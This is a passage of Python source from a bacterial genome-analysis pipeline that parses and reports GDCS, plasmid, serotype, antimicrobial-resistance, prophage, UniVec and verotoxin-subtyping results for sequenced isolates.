dictionary = pandas.read_csv(self.gdcs_report).to_dict()
# Iterate through the dictionary - each header from the CSV file
for header in dictionary:
# Sample is the primary key, and value is the value of the cell for that primary key + header combination
for sample, value in dictionary[header].items():
# Update the dictionary with the new data
if sample not in nesteddictionary:
nesteddictionary[sample] = dict()
nesteddictionary[sample].update({header: value})
for sample in self.runmetadata.samples:
# Create the GenObject with the necessary attributes
setattr(sample, self.analysistype, GenObject())
report_strains = list()
for key in nesteddictionary:
strain = nesteddictionary[key]['Strain']
report_strains.append(strain)
for sample in self.runmetadata.samples:
if strain == sample.name:
self.genobject_populate(key=key,
sample=sample,
nesteddictionary=nesteddictionary)
for sample in self.runmetadata.samples:
if sample.name not in report_strains:
self.genobject_populate(key=None,
sample=sample,
nesteddictionary=dict())
def genobject_populate(self, key, sample, nesteddictionary):
try:
# Pull the necessary values from the report
for header, value in nesteddictionary[key].items():
if header == 'TotalCore':
sample[self.analysistype].coreresults = value
elif header == 'MLST_genes':
sample[self.analysistype].mlst_genes_present, sample[self.analysistype].mlst_genes_total \
= value.split('/')
elif header == 'rMLST_genes':
sample[self.analysistype].rmlst_genes_present, \
sample[self.analysistype].rmlst_genes_total \
= value.split('/')
except KeyError:
pass
def __init__(self, inputobject):
self.reports = str()
self.samples = inputobject.runmetadata
self.starttime = inputobject.starttime
self.completemetadata = inputobject.runmetadata
self.path = inputobject.path
self.analysescomplete = True
self.reportpath = inputobject.reportpath
self.runmetadata = inputobject.runmetadata
self.homepath = inputobject.homepath
self.analysistype = 'gdcs'
self.cutoff = 0.9
self.pipeline = True
self.revbait = False
self.sequencepath = inputobject.path
self.targetpath = os.path.join(inputobject.reffilepath, self.analysistype)
self.cpus = inputobject.cpus
self.threads = int(self.cpus / len(self.runmetadata.samples)) \
if self.cpus / len(self.runmetadata.samples) > 1 else 1
self.logfile = inputobject.logfile
self.analyses = ['mlst', 'rmlst', 'cgmlst']
self.gdcs_report = os.path.join(self.reportpath, '{at}.csv'.format(at=self.analysistype))
class Plasmids(GeneSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
logging.info('Starting {at} analysis pipeline'.format(at=self.analysistype))
if not self.pipeline:
general = None
for sample in self.runmetadata.samples:
general = getattr(sample, 'general')
if general is None:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
# Run the analyses
ShortKSippingMethods(self, self.cutoff)
# Create the reports
self.reporter()
# Print the metadata
MetadataPrinter(self)
def reporter(self):
"""
Creates a report of the results
"""
# Create the path in which the reports are stored
make_path(self.reportpath)
data = 'Strain,Gene,PercentIdentity,Length,FoldCoverage\n'
with open(os.path.join(self.reportpath, self.analysistype + '.csv'), 'w') as report:
for sample in self.runmetadata.samples:
data += sample.name + ','
try:
if sample[self.analysistype].results:
multiple = False
for name, identity in sample[self.analysistype].results.items():
if not multiple:
data += '{},{},{},{}\n'.format(name, identity,
len(sample[self.analysistype].sequences[name]),
sample[self.analysistype].avgdepth[name])
else:
data += ',{},{},{},{}\n'.format(name, identity,
len(sample[self.analysistype].sequences[name]),
sample[self.analysistype].avgdepth[name])
multiple = True
else:
data += '\n'
except AttributeError:
data += '\n'
report.write(data)
class PlasmidExtractor(object):
def main(self):
"""
Run the methods in the correct order
"""
self.run_plasmid_extractor()
self.parse_report()
def run_plasmid_extractor(self):
"""
Create and run the plasmid extractor system call
"""
logging.info('Extracting plasmids')
# Define the system call
extract_command = 'PlasmidExtractor.py -i {inf} -o {outf} -p {plasdb} -d {db} -t {cpus} -nc' \
.format(inf=self.path,
outf=self.plasmid_output,
plasdb=os.path.join(self.plasmid_db, 'plasmid_db.fasta'),
db=self.plasmid_db,
cpus=self.cpus)
# Only attempt to extract plasmids if the report doesn't already exist
if not os.path.isfile(self.plasmid_report):
# Run the system calls
out, err = run_subprocess(extract_command)
# Acquire thread lock, and write the logs to file
self.threadlock.acquire()
write_to_logfile(extract_command, extract_command, self.logfile)
write_to_logfile(out, err, self.logfile)
self.threadlock.release()
def parse_report(self):
"""
Parse the plasmid extractor report, and populate metadata objects
"""
logging.info('Parsing Plasmid Extractor outputs')
# A dictionary to store the parsed excel file in a more readable format
nesteddictionary = dict()
# Use pandas to read in the CSV file, and convert the pandas data frame to a dictionary (.to_dict())
dictionary = pandas.read_csv(self.plasmid_report).to_dict()
# Iterate through the dictionary - each header from the CSV file
for header in dictionary:
# Sample is the primary key, and value is the value of the cell for that primary key + header combination
for sample, value in dictionary[header].items():
# Update the dictionary with the new data
try:
nesteddictionary[sample].update({header: value})
# Create the nested dictionary if it hasn't been created yet
except KeyError:
nesteddictionary[sample] = dict()
nesteddictionary[sample].update({header: value})
# Get the results into the metadata object
for sample in self.metadata:
# Initialise the plasmid extractor genobject
setattr(sample, self.analysistype, GenObject())
# Initialise the list of all plasmids
sample[self.analysistype].plasmids = list()
# Iterate through the dictionary of results
for line in nesteddictionary:
# Extract the sample name from the dictionary in a manner consistent with the rest of the COWBAT
# pipeline e.g. 2014-SEQ-0276_S2_L001 becomes 2014-SEQ-0276
sample_name = nesteddictionary[line]['Sample']
# Use the filer method to extract the name
name = list(filer([sample_name]))[0]
# Ensure that the names match
if name == sample.name:
# Append the plasmid name extracted from the dictionary to the list of plasmids
sample[self.analysistype].plasmids.append(nesteddictionary[line]['Plasmid'])
# Copy the report to the folder containing all reports for the pipeline
try:
shutil.copyfile(self.plasmid_report, os.path.join(self.reportpath, 'plasmidReport.csv'))
except IOError:
pass
def __init__(self, inputobject):
self.path = inputobject.path
self.reportpath = inputobject.reportpath
self.reffilepath = inputobject.reffilepath
self.analysistype = 'plasmidextractor'
self.plasmid_output = os.path.join(self.path, self.analysistype)
self.plasmid_db = os.path.join(self.reffilepath, self.analysistype)
self.plasmid_report = os.path.join(self.plasmid_output, 'plasmidReport.csv')
self.start = inputobject.starttime
self.cpus = inputobject.cpus
self.logfile = inputobject.logfile
self.threadlock = threading.Lock()
self.metadata = inputobject.runmetadata.samples
class Serotype(SeroSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
sero_report = os.path.join(self.reportpath, 'serosippr.csv')
if os.path.isfile(sero_report):
self.report_parse(sero_report)
else:
logging.info('Starting {} analysis pipeline'.format(self.analysistype))
# Run the analyses
ShortKSippingMethods(self, self.cutoff)
self.serotype_escherichia()
self.serotype_salmonella()
# Create the reports
self.reporter()
# Print the metadata
MetadataPrinter(self)
def report_parse(self, sero_report):
"""
Parse an existing report, and extract the results
:param sero_report: type STR: Name and absolute path of the report
"""
with open(sero_report, 'r') as report:
next(report)
for line in report:
data = line.rstrip().split(',')
for sample in self.runmetadata.samples:
if sample.name in line:
if data[1]:
setattr(sample, self.analysistype, GenObject())
o_results, h_results = data[1].split(':')
sample[self.analysistype].o_set = [o_results.split(' ')[0]]
try:
sample[self.analysistype].best_o_pid = o_results.split(' ')[1].replace('(', '') \
.replace(')', '')
except IndexError:
sample[self.analysistype].best_o_pid = 'ND'
sample[self.analysistype].h_set = [h_results.split(' ')[0]]
try:
sample[self.analysistype].best_h_pid = h_results.split(' ')[1].replace('(', '') \
.replace(')', '')
except IndexError:
sample[self.analysistype].best_h_pid = 'ND'
class ShortKSippingMethods(Sippr):
def main(self):
"""
Run the methods in the correct order for pipelines
"""
# Find the target files
self.targets()
kmer = 15 if self.analysistype == 'GDCS' else 17
# Use bbduk to bait the FASTQ reads matching the target sequences
self.bait(maskmiddle='t', k=kmer)
# If desired, use bbduk to bait the target sequences with the previously baited FASTQ files
if self.revbait:
self.reversebait(maskmiddle='t', k=kmer)
# Run the bowtie2 read mapping module
self.mapping()
# Use samtools to index the sorted bam file
self.indexing()
# Parse the results
# self.parsing()
self.parsebam()
# Filter out any sequences with cigar features such as internal soft-clipping from the results
# self.clipper()
class ResSippr(GeneSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
logging.info('Starting {} analysis pipeline'.format(self.analysistype))
if not self.pipeline:
general = None
for sample in self.runmetadata.samples:
general = getattr(sample, 'general')
if general is None:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
# Run the analyses
ShortKSippingMethods(inputobject=self,
cutoff=self.cutoff,
allow_soft_clips=self.allow_soft_clips)
# noinspection PyMissingConstructor
def __init__(self, args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline, revbait,
allow_soft_clips=False):
"""
:param args: command line arguments
:param pipelinecommit: pipeline commit or version
:param startingtime: time the script was started
:param scriptpath: home path of the script
:param analysistype: name of the analysis being performed - allows the program to find databases
:param cutoff: percent identity cutoff for matches
:param pipeline: boolean of whether this script needs to run as part of a particular assembly pipeline
:param allow_soft_clips: Boolean whether the BAM parsing should exclude sequences with internal soft clips
"""
# Initialise variables
# super().__init__(args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline, revbait)
self.commit = str(pipelinecommit)
self.starttime = startingtime
self.homepath = scriptpath
# Define variables based on supplied arguments
self.path = os.path.join(args.path)
assert os.path.isdir(self.path), u'Supplied path is not a valid directory {0!r:s}'.format(self.path)
try:
self.sequencepath = os.path.join(args.sequencepath)
except AttributeError:
self.sequencepath = self.path
assert os.path.isdir(self.sequencepath), u'Sequence path is not a valid directory {0!r:s}' \
.format(self.sequencepath)
try:
self.targetpath = os.path.join(args.reffilepath, analysistype)
except AttributeError:
self.targetpath = os.path.join(args.targetpath)
self.reportpath = os.path.join(self.path, 'reports')
assert os.path.isdir(self.targetpath), u'Target path is not a valid directory {0!r:s}' \
.format(self.targetpath)
try:
self.bcltofastq = args.bcltofastq
except AttributeError:
self.bcltofastq = False
try:
self.miseqpath = args.miseqpath
except AttributeError:
self.miseqpath = str()
try:
self.miseqfolder = args.miseqfolder
except AttributeError:
self.miseqfolder = str()
try:
self.fastqdestination = args.fastqdestination
except AttributeError:
self.fastqdestination = str()
try:
self.forwardlength = args.forwardlength
except AttributeError:
self.forwardlength = 'full'
try:
self.reverselength = args.reverselength
except AttributeError:
self.reverselength = 'full'
self.numreads = 2 if self.reverselength != 0 else 1
try:
self.customsamplesheet = args.customsamplesheet
except AttributeError:
self.customsamplesheet = False
self.logfile = args.logfile
# Set the custom cutoff value
self.cutoff = float(cutoff)
try:
self.averagedepth = int(args.averagedepth)
except AttributeError:
self.averagedepth = 10
try:
self.copy = args.copy
except AttributeError:
self.copy = False
self.runmetadata = args.runmetadata
# Use the argument for the number of threads to use, or default to the number of cpus in the system
self.cpus = int(args.cpus)
try:
self.threads = int(self.cpus / len(self.runmetadata.samples)) if self.cpus / len(self.runmetadata.samples) \
> 1 else 1
except TypeError:
self.threads = self.cpus
self.taxonomy = {'Escherichia': 'coli', 'Listeria': 'monocytogenes', 'Salmonella': 'enterica'}
self.analysistype = analysistype
self.pipeline = pipeline
self.revbait = revbait
self.allow_soft_clips = allow_soft_clips
class Resistance(ResSippr):
def main(self):
res_report = os.path.join(self.reportpath, 'resfinder.csv')
if os.path.isfile(res_report):
self.parse_report(res_report=res_report)
else:
self.runner()
# Create the reports
self.reporter()
def parse_report(self, res_report):
"""
Parse an existing report, and extract the results
:param res_report: type STR: name and absolute path of the report
"""
for sample in self.runmetadata.samples:
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].results = dict()
sample[self.analysistype].pipelineresults = list()
sample[self.analysistype].avgdepth = dict()
with open(res_report, 'r') as report:
next(report)
for line in report:
try:
strain, res, gene, allele, accession, perc_ident, length, fold_cov = line.rstrip().split(',')
if sample.name in line:
if strain:
name = '{gene}_{accession}_{allele}'.format(gene=gene,
accession=accession,
allele=allele)
sample[self.analysistype].results[name] = perc_ident
sample[self.analysistype].pipelineresults.append(
'{rgene} ({pid}%) {rclass}'.format(rgene=gene,
pid=perc_ident,
rclass=res))
sample[self.analysistype].avgdepth[name] = fold_cov
except ValueError:
pass
def reporter(self):
"""
Creates a report of the results
"""
logging.info('Creating {at} report'.format(at=self.analysistype))
resistance_classes = ResistanceNotes.classes(self.targetpath)
# Find unique gene names with the highest percent identity
for sample in self.runmetadata.samples:
try:
if sample[self.analysistype].results:
# Initialise a dictionary to store the unique genes, and their percent identities
sample[self.analysistype].uniquegenes = dict()
for name, identity in sample[self.analysistype].results.items():
# Split the name of the gene from the string e.g. ARR-2_1_HQ141279 yields ARR-2
genename = name.split('_')[0]
# Set the best observed percent identity for each unique gene
try:
# Pull the previous best identity from the dictionary
bestidentity = sample[self.analysistype].uniquegenes[genename]
# If the current identity is better than the old identity, save it
if float(identity) > float(bestidentity):
sample[self.analysistype].uniquegenes[genename] = float(identity)
# Initialise the dictionary if necessary
except KeyError:
sample[self.analysistype].uniquegenes[genename] = float(identity)
except AttributeError:
pass
# Create the path in which the reports are stored
make_path(self.reportpath)
# Initialise strings to store the results
data = 'Strain,Resistance,Gene,Allele,Accession,PercentIdentity,Length,FoldCoverage\n'
with open(os.path.join(self.reportpath, self.analysistype + '.csv'), 'w') as report:
for sample in self.runmetadata.samples:
# Create an attribute to store the string for the eventual pipeline report
sample[self.analysistype].pipelineresults = list()
if sample[self.analysistype].results:
results = False
for name, identity in sorted(sample[self.analysistype].results.items()):
# Extract the necessary variables from the gene name string
gname, genename, accession, allele = ResistanceNotes.gene_name(name)
# Retrieve the best identity for each gene
try:
percentid = sample[self.analysistype].uniquegenes[gname]
# Beta-lactamases will not have the allele and version from the gene name defined above
except KeyError:
percentid = sample[self.analysistype].uniquegenes[gname.split('-')[0]]
# If the percent identity of the current gene matches the best percent identity, add it to
# the report - there can be multiple occurrences of genes e.g.
# sul1,1,AY224185,100.00,840 and sul1,2,CP002151,100.00,927 are both included because they
# have the same 100% percent identity
if float(identity) == percentid:
try:
# Determine resistance phenotype of the gene
res = ResistanceNotes.resistance(name, resistance_classes)
# Populate the results
data += '{sn},{res},{gene},{allele},{accession},{identity},{length},{depth}\n'.format(
sn=sample.name,
res=res,
gene=genename,
allele=allele,
accession=accession,
identity=identity,
length=len(sample[self.analysistype].sequences[name]),
depth=sample[self.analysistype].avgdepth[name])
sample[self.analysistype].pipelineresults.append(
'{rgene} ({pid}%) {rclass}'.format(rgene=genename,
pid=identity,
rclass=res)
)
results = True
except KeyError:
pass
if not results:
data += '{sn}\n'.format(sn=sample.name)
else:
data += '{sn}\n'.format(sn=sample.name)
# Write the string to the file
report.write(data)
class ResFinder(GeneSeekr):
@staticmethod
def sequencenames(contigsfile):
"""
Takes a multifasta file and returns a list of sequence names
:param contigsfile: multifasta of all sequences
:return: list of all sequence names
"""
sequences = list()
        for record in SeqIO.parse(open(contigsfile, "r", encoding="iso-8859-15"), "fasta"):
sequences.append(record.id)
return sequences
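    # Example: for a multifasta with records ">sul1_1_AY224185" and
    # ">ARR-2_1_HQ141279", sequencenames() returns
    # ['sul1_1_AY224185', 'ARR-2_1_HQ141279'].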
def strainer(self):
for sample in self.metadata:
if sample.general.bestassemblyfile != 'NA':
setattr(sample, self.analysistype, GenObject())
targets = glob(os.path.join(self.targetpath, '*.tfa'))
targetcheck = glob(os.path.join(self.targetpath, '*.tfa'))
if targetcheck:
try:
combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
except IndexError:
combinetargets(targets, self.targetpath)
combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
sample[self.analysistype].targets = targets
sample[self.analysistype].combinedtargets = combinedtargets
sample[self.analysistype].targetpath = self.targetpath
sample[self.analysistype].targetnames = self.sequencenames(combinedtargets)
sample[self.analysistype].reportdir = os.path.join(sample.general.outputdirectory,
self.analysistype)
make_path(sample[self.analysistype].reportdir)
else:
# Set the metadata file appropriately
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
else:
# Set the metadata file appropriately
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
def resfinderreporter(self):
"""
Custom reports for ResFinder analyses. These reports link the gene(s) found to their resistance phenotypes
"""
# Initialise resistance dictionaries from the notes.txt file
resistance_classes = ResistanceNotes.classes(self.targetpath)
# Create a workbook to store the report. Using xlsxwriter rather than a simple csv format, as I want to be
# able to have appropriately sized, multi-line cells
workbook = xlsxwriter.Workbook(os.path.join(self.reportpath, '{}.xlsx'.format(self.analysistype)))
# New worksheet to store the data
worksheet = workbook.add_worksheet()
        # Add a bold format for header cells. Using a monotype font, size 8
bold = workbook.add_format({'bold': True, 'font_name': 'Courier New', 'font_size': 8})
        # Format for data cells. Monotype, size 8, top vertically justified
courier = workbook.add_format({'font_name': 'Courier New', 'font_size': 8})
courier.set_align('top')
# Initialise the position within the worksheet to be (0,0)
row = 0
col = 0
# A dictionary to store the column widths for every header
columnwidth = dict()
extended = False
headers = ['Strain', 'Gene', 'Allele', 'Resistance', 'PercentIdentity', 'PercentCovered', 'Contig', 'Location',
'nt_sequence']
for sample in self.metadata:
# Create an attribute to store the string for the eventual pipeline report
sample[self.analysistype].pipelineresults = list()
sample[self.analysistype].sampledata = list()
try:
blastresults = sample[self.analysistype].blastresults
except AttributeError:
blastresults = 'NA'
# Process the sample only if the script could find targets
if blastresults != 'NA':
for result in sample[self.analysistype].blastresults:
# Set the name to avoid writing out the dictionary[key] multiple times
name = result['subject_id']
# Use the ResistanceNotes gene name extraction method to get the necessary variables
gname, genename, accession, allele = ResistanceNotes.gene_name(name)
# Initialise a list to store all the data for each strain
data = list()
# Determine resistance phenotype of the gene
resistance = ResistanceNotes.resistance(name, resistance_classes)
# Append the necessary values to the data list
data.append(genename)
data.append(allele)
data.append(resistance)
percentid = result['percentidentity']
data.append(percentid)
data.append(result['alignment_fraction'])
data.append(result['query_id'])
data.append('...'.join([str(result['low']), str(result['high'])]))
try:
# Populate the attribute storing the resfinder results
sample[self.analysistype].pipelineresults.append(
'{rgene} ({pid}%) {rclass}'.format(rgene=genename,
pid=percentid,
rclass=resistance))
# Only if the alignment option is selected, for inexact results, add alignments
if self.align and percentid != 100.00:
# Align the protein (and nucleotide) sequences to the reference
self.alignprotein(sample, name)
if not extended:
# Add the appropriate headers
headers.extend(['aa_Identity',
'aa_Alignment',
'aa_SNP_location',
'nt_Alignment',
'nt_SNP_location'
])
extended = True
# Create a FASTA-formatted sequence output of the query sequence
record = SeqRecord(sample[self.analysistype].dnaseq[name],
id='{}_{}'.format(sample.name, name),
description='')
# Add the alignment, and the location of mismatches for both nucleotide and amino
# acid sequences
data.extend([record.format('fasta'),
sample[self.analysistype].aaidentity[name],
sample[self.analysistype].aaalign[name],
sample[self.analysistype].aaindex[name],
sample[self.analysistype].ntalign[name],
sample[self.analysistype].ntindex[name]
])
else:
record = SeqRecord(Seq(result['subject_sequence']),
id='{}_{}'.format(sample.name, name),
description='')
data.append(record.format('fasta'))
if self.align:
# Add '-'s for the empty results, as there are no alignments for exact matches
data.extend(['100', '-', '-', '-', '-'])
# If there are no blast results for the target, add a '-'
except (KeyError, TypeError):
data.append('-')
sample[self.analysistype].sampledata.append(data)
if 'nt_sequence' not in headers:
headers.append('nt_sequence')
# Write the header to the spreadsheet
for header in headers:
worksheet.write(row, col, header, bold)
# Set the column width based on the longest header
try:
columnwidth[col] = len(header) if len(header) > columnwidth[col] else columnwidth[
col]
except KeyError:
columnwidth[col] = len(header)
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# Write out the data to the spreadsheet
for sample in self.metadata:
            if not sample[self.analysistype].sampledata:
                # Write the sample name, so that strains without results still appear in the report
                worksheet.write(row, col, sample.name, courier)
                # Increment the row and reset the column in preparation for the next strain
                row += 1
                col = 0
for data in sample[self.analysistype].sampledata:
columnwidth[col] = len(sample.name) + 2
worksheet.set_column(col, col, columnwidth[col])
worksheet.write(row, col, sample.name, courier)
col += 1
# List of the number of lines for each result
totallines = list()
for results in data:
                    # Write the result to the current cell
                    worksheet.write(row, col, results, courier)
                    try:
                        # Counting the full length of a multi-line string yields columns that are
                        # far too wide; use the length of the second line (the first sequence line
                        # of the FASTA record) instead
                        alignmentcorrect = len(str(results).split('\n')[1])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
except IndexError:
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(str(results).split('\n')[0])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
# If there are no newline characters, set the width to the length of the string
except AttributeError:
alignmentcorrect = len(str(results))
lines = 1
# Add the number of lines to the list
totallines.append(lines)
# Increase the width of the current column, if necessary
try:
columnwidth[col] = alignmentcorrect if alignmentcorrect > columnwidth[col] else \
columnwidth[col]
except KeyError:
columnwidth[col] = alignmentcorrect
worksheet.set_column(col, col, columnwidth[col])
col += 1
            # Set the height of the row to be the number of lines (number of newline characters) * 11
worksheet.set_row(row, max(totallines) * 11)
# Increase the row counter for the next strain's data
row += 1
col = 0
# Close the workbook
workbook.close()
def object_clean(self):
"""
Remove large attributes from the metadata objects
"""
for sample in self.metadata:
try:
delattr(sample[self.analysistype], 'aaidentity')
delattr(sample[self.analysistype], 'aaalign')
delattr(sample[self.analysistype], 'aaindex')
delattr(sample[self.analysistype], 'ntalign')
delattr(sample[self.analysistype], 'ntindex')
delattr(sample[self.analysistype], 'dnaseq')
delattr(sample[self.analysistype], 'blastresults')
except AttributeError:
pass
def __init__(self, inputobject):
self.resfinderfields = ['query_id', 'subject_id', 'positives', 'mismatches', 'gaps', 'evalue', 'bit_score',
'subject_length', 'alignment_length', 'query_start', 'query_end']
self.analysistype = 'resfinder_assembled'
self.metadata = inputobject.runmetadata.samples
self.cutoff = 70
self.start = inputobject.starttime
self.reportdir = inputobject.reportpath
self.pipeline = True
self.referencefilepath = inputobject.reffilepath
self.targetpath = os.path.join(self.referencefilepath, 'resfinder')
self.threads = inputobject.cpus
self.align = True
self.logfile = inputobject.logfile
self.unique = True
self.strainer()
self.runmetadata = MetadataObject()
self.runmetadata.samples = self.metadata
GeneSeekr.__init__(self, self)
self.resfinderreporter()
self.object_clean()
class Prophages(BLAST):
def create_reports(self):
with open(os.path.join(self.reportpath, 'prophages.csv'), 'w') as report:
data = 'Strain,Gene,Host,PercentIdentity,PercentCovered,Contig,Location\n'
# Set the required variables to load prophage data from a summary file
overview = glob(os.path.join(self.targetpath, '*.txt'))[0]
            # A dictionary to store the parsed summary data in a more readable format
            prophagedata = dict()
            # Use pandas to read in the tab-separated summary file, and convert the resulting
            # data frame to a dictionary (.to_dict())
            dictionary = pandas.read_csv(overview, sep='\t').to_dict()
            # Iterate through the dictionary - each header from the summary file
for header in dictionary:
# Sample is the primary key, and value is the value of the cell for that primary key + header combo
for sample, value in dictionary[header].items():
# Update the dictionary with the new data
try:
prophagedata[sample].update({header: value})
# Create the nested dictionary if it hasn't been created yet
except KeyError:
prophagedata[sample] = dict()
prophagedata[sample].update({header: value})
for sample in self.metadata:
# Create a set to ensure that genes are only entered into the report once
genes = set()
if sample.general.bestassemblyfile != 'NA':
try:
if sample[self.analysistype].blastlist:
for result in sample[self.analysistype].blastlist:
gene = result['subject_id']
if gene not in genes:
# Iterate through the phage data in the dictionary
for query_id, phage in prophagedata.items():
if phage['id_prophage'] == gene:
# Add the data to the row
data += '{sn},{gene},{host},{ident},{cov},{contig},{start}..{stop}\n' \
.format(sn=sample.name,
gene=gene,
host=phage['host'],
ident=result['percentidentity'],
cov=result['alignment_fraction'] if float(
result['alignment_fraction']) <= 100 else '100.0',
contig=result['query_id'],
start=result['low'],
stop=result['high'])
genes.add(gene)
else:
data += '{sn}\n'.format(sn=sample.name)
except AttributeError:
data += '{sn}\n'.format(sn=sample.name)
else:
data += '{sn}\n'.format(sn=sample.name)
report.write(data)
class Univec(BLAST):
def create_reports(self):
with open(os.path.join(self.reportpath, 'univec.csv'), 'w') as report:
data = 'Strain,Gene,Description,PercentIdentity,PercentCovered,Contig,Location\n'
for sample in self.metadata:
if sample.general.bestassemblyfile != 'NA':
# Create a set to ensure that genes are only entered into the report once
genes = set()
try:
if sample[self.analysistype].blastlist:
gene_set = set()
for result in sample[self.analysistype].blastlist:
gene_set.add(result['subject_id'])
for gene in sorted(list(gene_set)):
for result in sample[self.analysistype].blastlist:
if gene == result['subject_id']:
# Parse the reference file in order to extract the description of the BLAST hits
for entry in SeqIO.parse(sample[self.analysistype].combinedtargets, 'fasta'):
# Find the corresponding entry for the gene
if entry.id.lstrip('g') == gene:
# Cut out the description from the entry.description using regex
# e.g. 'gnl|uv|X66730.1:1-2687-49 B.bronchiseptica plasmid pBBR1 genes
# for mobilization and replication' only save the string after '2687-49'
                                            description = re.findall(r'\d+-\d+\s(.+)', entry.description)[0]
# Replace commas with semicolons
description = description.replace(',', ';')
# Don't add the same gene more than once to the report
if gene not in genes:
data += '{sn},{gene},{desc},{pi},{pc},{cont},{start}..{stop}\n' \
.format(sn=sample.name,
gene=gene.split('|')[-1],
desc=description,
pi=result['percentidentity'],
pc=result['alignment_fraction'] if float(
result['alignment_fraction']) <= 100 else '100.0',
cont=result['query_id'],
start=result['low'],
stop=result['high'])
# Add the gene name to the set
genes.add(gene)
else:
data += '{sn}\n'.format(sn=sample.name)
except AttributeError:
data += '{sn}\n'.format(sn=sample.name)
else:
data += '{sn}\n'.format(sn=sample.name)
report.write(data)
class Verotoxin(KMA):
def main(self):
self.targets()
self.index_targets()
self.load_kma_db()
self.run_kma_mem_mode()
self.run_kma()
self.unload_kma_db()
self.parse_kma_outputs()
self.verotoxin_subtyping()
self.reporter()
self.kma_report()
def verotoxin_subtyping(self):
"""
Use the virulence results to perform verotoxin subtyping analyses
"""
logging.info('Performing verotoxin subtyping')
for sample in self.runmetadata.samples:
sample[self.analysistype].verotoxin_subtypes = dict()
sample[self.analysistype].verotoxin_subtypes_set = set()
sample[self.analysistype].verotoxindict = dict()
if sample[self.analysistype].kmaresults:
                # Iterate through all of the KMA results for the sample
for name, identity in sorted(sample[self.analysistype].kmaresults.items()):
if 'stx' in name:
try:
if ':' in name:
gene, allele, accession, subtype = name.split(':')
else:
gene, accession, subtype = name.split('_')
# Split off the 'stx' from the name
gene_type = gene.split('stx')[-1]
self.dictionary_populate(sample=sample,
gene_type=gene_type,
subtype=subtype,
identity=identity)
# Ignore entries without a subtype
except ValueError:
pass
# Perform subtyping - iterate through the three categories of verotoxin genes: vtx1 and vtx2 with
# subunits, and vtx2 without a subunit
for a_subunit in ['1A', '2A', '2']:
# Use the subunit name to set the name of the B subunit
b_subunit = a_subunit.replace('A', 'B')
# Determine whether the verotoxin gene is vtx1 or vtx2
verotoxin_gene = a_subunit[0]
# If the sample lacks a particular verotoxin subunit, a KeyError will occur. This is fine. Not
# all samples have any/all verotoxin subunits
try:
for subtype, percent_id in sorted(sample[self.analysistype].verotoxindict[a_subunit].items()):
                            # Create a string with the desired output name of the gene/subtype
vtx_gene = 'vtx{gene}{subtype}'.format(gene=verotoxin_gene,
subtype=subtype)
# The subunit-less '2' verotoxin gene needs special treatment
if a_subunit != '2':
try:
# Populate the dictionary with the verotoxin gene: (subunit A %ID, subunit B %ID)
# e.g. vtx2A: (100.0, 100.0)
sample[self.analysistype].verotoxin_subtypes[vtx_gene] = \
(percent_id,
sample[self.analysistype].verotoxindict[b_subunit][subtype])
# Add the verotoxin gene to the set of sample subtypes
sample[self.analysistype].verotoxin_subtypes_set.add(vtx_gene)
except KeyError:
# There are no 2B genes present in the database for subtype vtx2b, allow a match
# for this subtype if only the '2A' gene is present
if a_subunit == '2A' and subtype == 'b':
sample[self.analysistype].verotoxin_subtypes[vtx_gene] = (percent_id,)
sample[self.analysistype].verotoxin_subtypes_set.add(vtx_gene)
else:
# Only add the results from the subunit-less gene if it is the only match for that
# subtype. e.g. if vtx2b already is present in the dictionary, do not look at the hits
# for it again
if vtx_gene not in sample[self.analysistype].verotoxin_subtypes:
sample[self.analysistype].verotoxin_subtypes[vtx_gene] = (percent_id,)
sample[self.analysistype].verotoxin_subtypes_set.add(vtx_gene)
except KeyError:
pass
# Create a string summarizing the verotoxin subtypes present. Create a semi-colon-separated list of the
# sorted subtypes e.g. vtx1a;vtx2a;vtx2c if there were subtypes detected. Otherwise, set the subtype
# to 'ND'
sample[self.analysistype].verotoxin_subtypes_set = \
';'.join(sorted(sample[self.analysistype].verotoxin_subtypes_set)) \
if sample[self.analysistype].verotoxin_subtypes_set else 'ND'
# If there are no results, set the profile to 'ND'
else:
sample[self.analysistype].verotoxin_subtypes_set = 'ND'
def dictionary_populate(self, sample, gene_type, subtype, identity):
"""
Populate the supplied nested dictionary with the necessary values. Initialise the dictionary as required
"""
if gene_type not in sample[self.analysistype].verotoxindict:
sample[self.analysistype].verotoxindict[gene_type] = dict()
if subtype not in sample[self.analysistype].verotoxindict[gene_type]:
sample[self.analysistype].verotoxindict[gene_type].update({subtype: identity})
if identity > sample[self.analysistype].verotoxindict[gene_type][subtype]:
sample[self.analysistype].verotoxindict[gene_type][subtype] = identity
def reporter(self):
"""
Create a summary report of the verotoxin subtyping
"""
logging.info('Creating verotoxin subtyping summary report')
# Initialise a string with the report headers
data = 'Strain,ToxinProfile\n'
# Set the name of the summary report
report = os.path.join(self.reportpath, 'verotoxin_summary.csv')
with open(report, 'w') as summary:
for sample in self.runmetadata.samples:
# Store the subtype string for each sample
data += '{sn},{subtypes}\n'.format(sn=sample.name,
subtypes=sample[self.analysistype].verotoxin_subtypes_set)
# Write the string to the report
summary.write(data)
